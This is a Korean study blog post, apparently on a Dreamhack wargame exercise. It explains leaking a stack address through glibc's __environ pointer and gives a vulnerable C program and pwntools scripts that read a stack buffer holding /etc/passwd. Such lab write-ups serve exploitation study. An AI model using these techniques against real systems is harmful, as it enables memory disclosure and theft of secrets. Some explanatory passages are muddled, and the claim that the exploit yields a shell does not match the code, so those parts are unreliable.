__environ

---

Exploit Tech: __environ

프로그램에서 리턴 명령어를 수행하면 lib와 인자에서 다양한 함수 호출!

// Name: environ.c
// Compile: gcc -o environ environ.c
 
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <signal.h>
#include <stdlib.h>
 
void sig_handle() {
  exit(0);
}
 
void init() {
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
 
  signal(SIGALRM, sig_handle);
  alarm(5);
}
 
void read_file() {
  char file_buf[4096];
 
  int fd = open("/etc/passwd", O_RDONLY);
  read(fd, file_buf, sizeof(file_buf) - 1);
  close(fd);
}
 
int main() {
  char buf[1024];
  long addr;
  int idx;
 
  init();
  read_file();
 
  printf("stdout: %p\n", stdout);
 
  while (1) {
    printf("> ");
    scanf("%d", &idx);
    switch (idx) {
      case 1:
        printf("Addr: ");
        scanf("%ld", &addr);
        printf("%s", (char *)addr);
        break;
      default:
        break;
    }
  }
  return 0;
}

프로세스는 환경 변수 정보를 저장하고, 필요할 때마다 불러와 사용합니다.
이번엔 lib 함수에서 참조하는 환경 변수 포인터와 관련된 공격을 실습합시다.

/etc/passwd 파일의 내용을 읽고 스택 버퍼에 저장하는군요
메인 함수에서는 stdout 라이브러리 주소를 출력하고, 반복해 임의 주소에 있는 값을
읽을 수 있는 취약점이 존재합니다.

---

환경 변수

모든 보호기법이 존재하기에 모든 OS가 사용하는 환경변수(environment ariable)는
매번 변할 수 있는 동적인 값들의 모임으로, 시스템의 정보를 갖고 있는 변수입니다.

이는 사용자가 직접 추가 및 수정하거나 삭제할 수 있는 값입니다. 리눅스에서 제공하는 명령어들은
'/bin', '/usr/bin'등의 디렉터리에 위치합니다. 우리가 명령어를 입력하면 환경 변수에 명시된
dir에서 명령어를 탐색, 실행하기 때문에 명령어의 경로를 입력하지 않아도 됩니다.

환경 변수는 터미널 뿐만 아니라 프로그램에서도 참조되기에 프로그램에서도
명령어를 실행하는 경우가 종종 있으며, 절대 경로를 입력 X 명령어 실행 가능!
이 또한 프로세스를 로드하면서 환경 변수를 초기화 했기 때문입니다.

리눅스 바이너리를 공격할 때 상황에 따라 스택 주소를 알아내야 할 때가 종종 있습니다.

 그러나 기본적으로 리눅스 바이너리는 스택 주소를 포함하지 않기 때문에 명령어의 경로 입력 X 때문에 스택 주소를 전역 변수에 저장하는 코드가 있지 않는 한 바이너리 주소 내에서 스택 주소를 찾는 것은 불가능합니다. 환경변수에 대한 정보는 스택 영역에 존재하며, 라이브러리 함수를 실행할 때에도 해당 정보를 참조하기 때문에 환경 변수를 가리키는 포인터가 별도로 선언되어 있습니다.

따라서, 해당 라이브러리 주소를 알고 있고, 임의의 주소를 읽을 수 있는 취약점이 있다면 스택 주소를 알아낼 수 있습니다.

---

__environ

위 이미지를 보시면 libc.so.6(docker에서 확인 할 수 있는거 같은데 도커 환경 구축 및 기타 공부.. ㅠ)
environ 심볼을 찾는 명령어를 실행한 모습입니다.

실행 결과를 살펴보면, __environ이라는 이름의 전역 변수가 존재합니다.
이는 시스템 명령어를 실행하기 위한 execve 계열의 함수와 getenv 등 환경변수와 관련된 함수 참조 변수로
그렇다면, 앞서 컴파일 한 예제를 디버깅하여 해당 포인터에 어떤 주소가 있는지 확인해봅시다.

마지막은.. 저렇게 나오면 안되는데 으음..

__environ 포인터의 주소를 확인하고, 해당 주소가 가르키는 영역을 확인한 결과입니다.
이는 더블 포인터(!)로, 각 환경 변수 문자열이 포함된 주소를 갖고 있는 것을 확인할 수 있으며,
해당 주소를 vmmap 명령어로 확인한 결과 스택 영역임을 알 수 있습니다.

만약, 라이브러리 주소를 알고 있고, 해당 주소를 읽을 수 있는 취약점이 있다면..
스택 주소를 릭하고 공격에 이용할 수 있습니다.

---

exploit 설계

 __environ 주소 계산

예제에서 제공한 stdout lib 포인터를 통해 베이스 주소를 계산하고,
__environ 포인터의 주소를 알아냅니다. 이는 각 심볼의 주소와 연산하여 쉽게 알 수 있음!

스택 주소 계산

__environ 주소를 알아냈다면, 예제의 임의 주소 읽기 취약점을 통해 스택 주소를 알아내고,
"/etc/passwd" 파일의 내용이 저장된 스택 버퍼의 주소를 계산합니다.

해당 주소는 환경 변수와 상대적인 거리가 매번 같으므로, 디버깅을 통해 알아봅시다.

파일 내용 읽기

파일의 내용을 저장하고 있는 스택 버퍼 주소를 알아냈다면,
임의 주소 읽기 취약점을 통해 스택 버퍼를 출력하여 파일의 내용을 획득합니다

---

read_file() 함수에서 flag을 열고 읽고 있기에 stdout으로 lib_base와 이번엔 로더가 아닌
스택 인자를 통해 알아봅시다. 위 코드를 보시면 임의 주소 읽기 취약점이 존재하므로..
위 내용으로 따라간다면 셸을 획득할 수 있습니다.

---

Exploit code

1. __environ 주소 계산

# Name: environ.py
from pwn import *
 
p = process("./environ")
elf = ELF('/lib/x86_64-linux-gnu/libc.so.6')
 
p.recvuntil(": ")
 
stdout = int(p.recvuntil("\n"),16)
libc_base = stdout - elf.symbols['_IO_2_1_stdout_']
libc_environ = libc_base + elf.symbols['__environ']
 
print(hex(libc_base))
print(hex(libc_environ))
 
p.interactive()

stdout 주소를 획득하고, lib에서 해당 심볼의 주소를 알아낸 뒤 lib_base를 알아내고,
이후 앞서 알아본 __environ 포인터의 심볼 주소를 더해 해당 포인터도 구합시다.

위 코드는 pwn를 이용하여 계산한 모습입니다.

---

2. stack address solve

__environ 주소를 알아냈다면, 임의 주소 읽기 취약점을 통해 스택 주소를 구하고,
이를 기반으로 파일의 내용이 저장된 스택 버퍼의 주소를 알아내야 합니다.

파일 내용이 저장된 스택 버퍼와 __environ 변수가 가르키는 스택 주소의 거리 간격은..
아래 이미지를 통해 확인 할 수 있습니다.

01

참고로 마지막은(또 환경 문제.. 이거 과제 끝낸 후 다시 한번 전체적으로 해봐야겠네요 ㅠ)
0x1538로 나와야해요

나머지는 이미지에서 확인할 수 있기에 다음으로 넘어갑시당

---

3. 파일 내용 읽기

두 주소의 간격을 알아냈다면, __environ 주소에서 두 주소의 간격인 0x1538을
뺀 주소를 임의 주소 읽기 취약점을 통해 출력합니다.

# Name: environ.py
from pwn import *
 
#p = process("./environ_exercise")
p = remote('host3.dreamhack.games', 10123)
elf = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec=False)
 
p.recvuntil(": ")
 
stdout = int(p.recvuntil("\n"),16)
libc_base = stdout - elf.symbols['_IO_2_1_stdout_']
libc_environ = libc_base + elf.symbols['__environ']
 
log.info(f'libc_base : {hex(libc_base)}')
log.info(f'libc_environ : {hex(libc_environ)}')
 
p.sendlineafter(">", "1")
p.sendlineafter(":", str(libc_environ))
 
p.recv(1)
stack_environ = u64(p.recv(6).ljust(8, b"\x00")) 
#stack_environ = u64(p.recvuntil("\x7f").ljust(8, b"\x00"))
file_content = stack_environ - 0x1538
 
log.info(f'stack_environ: {hex(stack_environ)}')
log.info(f'file_content {hex(file_content)}')
 
p.sendlineafter(">", "1")
p.sendlineafter(":", str(file_content))
 
p.interactive()

위에는 여기서 필요한 lib의 심볼값 그리고 leak의 구한 모습이며, 위에서 설명했으며,
1번을 넣어서 주소 값을 lib_base를 넣으며 인자의 포인터의 위치와 그전에 구한
/etc/passwd 파일의 offset의 거리를 빼서 구한다면요

해당 구할려는 flag의 파일의 포인터의 위치 즉, 해당 파일을 알 수 있습니다.

---

참고 자료

 

참고 이미지